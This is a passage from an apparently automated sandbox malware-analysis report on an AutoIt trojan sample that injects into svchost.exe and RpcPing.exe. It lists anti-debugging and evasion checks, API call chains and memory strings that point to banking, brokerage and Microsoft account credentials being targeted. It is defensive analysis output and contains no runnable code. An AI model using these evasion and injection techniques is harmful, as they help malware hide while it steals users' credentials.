            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9B623 push FFFFFF8Fh; retf | 9_2_02C9B627
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00754A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00754A35
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007D55FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_007D55FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exeCode function: 0_2_007733C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007733C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | API/Special instruction interceptor: Address: 36C3234
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442D324
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442D7E4
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442D944
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442D504
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442D544
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442D1E4
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB4430154
            Source: C:\Windows\SysWOW64\RpcPing.exe | API/Special instruction interceptor: Address: 7FFDB442DA44
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E rdtsc | 2_2_03C7096E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes | graph_0-99290
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | API coverage: 4.7 %
            Source: C:\Windows\SysWOW64\svchost.exe | API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\RpcPing.exe | API coverage: 2.6 %
            Source: C:\Windows\SysWOW64\RpcPing.exe TID: 6684 | Thread sleep time: -34000s >= -30000s
            Source: C:\Windows\SysWOW64\RpcPing.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B4696 GetFileAttributesW,FindFirstFileW,FindClose, | 0_2_007B4696
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BC93C FindFirstFileW,FindClose, | 0_2_007BC93C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, | 0_2_007BC9C7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_007BF200
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, | 0_2_007BF35D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_007BF65E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_007B3A2B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007B3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, | 0_2_007B3D4E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007BBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, | 0_2_007BBF27
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9C400 FindFirstFileW,FindNextFileW,FindClose, | 9_2_02C9C400
            Source: C:\Windows\SysWOW64\RpcPing.exe | Code function: 9_2_02C9C536 FindFirstFileW,FindNextFileW,FindClose, | 9_2_02C9C536
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00754AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_00754AFE
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
            Source: 45570IH2.9.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
            Source: 45570IH2.9.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
            Source: 45570IH2.9.dr | Binary or memory string: discord.comVMware20,11696487552f
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PasswordVMware20
            Source: 45570IH2.9.dr | Binary or memory string: bankofamerica.comVMware20,11696487552x
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware20,1169648
            Source: 45570IH2.9.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
            Source: 45570IH2.9.dr | Binary or memory string: ms.portal.azure.comVMware20,11696487552
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: /profileVMware20W
            Source: 45570IH2.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
            Source: 45570IH2.9.dr | Binary or memory string: global block list test formVMware20,11696487552
            Source: 45570IH2.9.dr | Binary or memory string: tasks.office.comVMware20,11696487552o
            Source: DUipWAeQLm.exe, 0000000A.00000002.3338852001.0000000000DEF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
            Source: 45570IH2.9.dr | Binary or memory string: AMC password management pageVMware20,11696487552
            Source: firefox.exe, 0000000B.00000002.3126320701.000001E336EFC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 45570IH2.9.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
            Source: 45570IH2.9.dr | Binary or memory string: interactivebrokers.comVMware20,11696487552
            Source: 45570IH2.9.dr | Binary or memory string: dev.azure.comVMware20,11696487552j
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
            Source: 45570IH2.9.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rdVMware20,11696
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rs - HKVMware20,F
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: formVMware20,11
            Source: 45570IH2.9.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: zure.comVMware20
            Source: 45570IH2.9.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
            Source: 45570IH2.9.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
            Source: 45570IH2.9.dr | Binary or memory string: outlook.office365.comVMware20,11696487552t
            Source: 45570IH2.9.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
            Source: RpcPing.exe, 00000009.00000002.3338691097.0000000003062000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllE
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ropeVMware20,116,
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
            Source: 45570IH2.9.dr | Binary or memory string: outlook.office.comVMware20,11696487552s
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: rd.comVMware20,1z
            Source: 45570IH2.9.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
            Source: 45570IH2.9.dr | Binary or memory string: turbotax.intuit.comVMware20,11696487552t
            Source: 45570IH2.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
            Source: RpcPing.exe, 00000009.00000002.3342129318.0000000007CE5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ansaction PasswordVMware
            Source: 45570IH2.9.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
            Source: 45570IH2.9.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | API call chain: ExitProcess graph end node | graph_0-97906
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | API call chain: ExitProcess graph end node | graph_0-97978
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\RpcPing.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C7096E rdtsc | 2_2_03C7096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00417CC3 LdrLoadDll, | 2_2_00417CC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007C41FD BlockInput, | 0_2_007C41FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00753B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, | 0_2_00753B4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_00785CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, | 0_2_00785CCC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_007CC304 LoadLibraryA,GetProcAddress, | 0_2_007CC304
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_036C3500 mov eax, dword ptr fs:[00000030h] | 0_2_036C3500
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_036C34A0 mov eax, dword ptr fs:[00000030h] | 0_2_036C34A0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.AutoIt.1410.27401.28230.exe | Code function: 0_2_036C1E70 mov eax, dword ptr fs:[00000030h] | 0_2_036C1E70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CEC3CD mov eax, dword ptr fs:[00000030h] | 2_2_03CEC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C3A3C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C3A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C383C0 mov eax, dword ptr fs:[00000030h] | 2_2_03C383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB63C0 mov eax, dword ptr fs:[00000030h] | 2_2_03CB63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDE3DB mov ecx, dword ptr fs:[00000030h] | 2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CDE3DB mov eax, dword ptr fs:[00000030h] | 2_2_03CDE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] | 2_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CD43D4 mov eax, dword ptr fs:[00000030h] | 2_2_03CD43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C403E9 mov eax, dword ptr fs:[00000030h] | 2_2_03C403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C4E3F0 mov eax, dword ptr fs:[00000030h] | 2_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C663FF mov eax, dword ptr fs:[00000030h] | 2_2_03C663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C2E388 mov eax, dword ptr fs:[00000030h] | 2_2_03C2E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] | 2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C5438F mov eax, dword ptr fs:[00000030h] | 2_2_03C5438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] | 2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] | 2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03C28397 mov eax, dword ptr fs:[00000030h] | 2_2_03C28397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB2349 mov eax, dword ptr fs:[00000030h] | 2_2_03CB2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] | 2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] | 2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] | 2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB035C mov ecx, dword ptr fs:[00000030h] | 2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] | 2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03CB035C mov eax, dword ptr fs:[00000030h] | 2_2_03CB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA352 mov eax, dword ptr fs:[00000030h]2_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD8350 mov ecx, dword ptr fs:[00000030h]2_2_03CD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0634F mov eax, dword ptr fs:[00000030h]2_2_03D0634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD437C mov eax, dword ptr fs:[00000030h]2_2_03CD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6A30B mov eax, dword ptr fs:[00000030h]2_2_03C6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2C310 mov ecx, dword ptr fs:[00000030h]2_2_03C2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C50310 mov ecx, dword ptr fs:[00000030h]2_2_03C50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov ecx, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D08324 mov eax, dword ptr fs:[00000030h]2_2_03D08324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]2_2_03C3A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D062D6 mov eax, dword ptr fs:[00000030h]2_2_03D062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C402E1 mov eax, dword ptr fs:[00000030h]2_2_03C402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E284 mov eax, dword ptr fs:[00000030h]2_2_03C6E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB0283 mov eax, dword ptr fs:[00000030h]2_2_03CB0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC62A0 mov eax, dword ptr fs:[00000030h]2_2_03CC62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov eax, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB8243 mov ecx, dword ptr fs:[00000030h]2_2_03CB8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0625D mov eax, dword ptr fs:[00000030h]2_2_03D0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2A250 mov eax, dword ptr fs:[00000030h]2_2_03C2A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C36259 mov eax, dword ptr fs:[00000030h]2_2_03C36259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEA250 mov eax, dword ptr fs:[00000030h]2_2_03CEA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C34260 mov eax, dword ptr fs:[00000030h]2_2_03C34260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2826B mov eax, dword ptr fs:[00000030h]2_2_03C2826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0274 mov eax, dword ptr fs:[00000030h]2_2_03CE0274
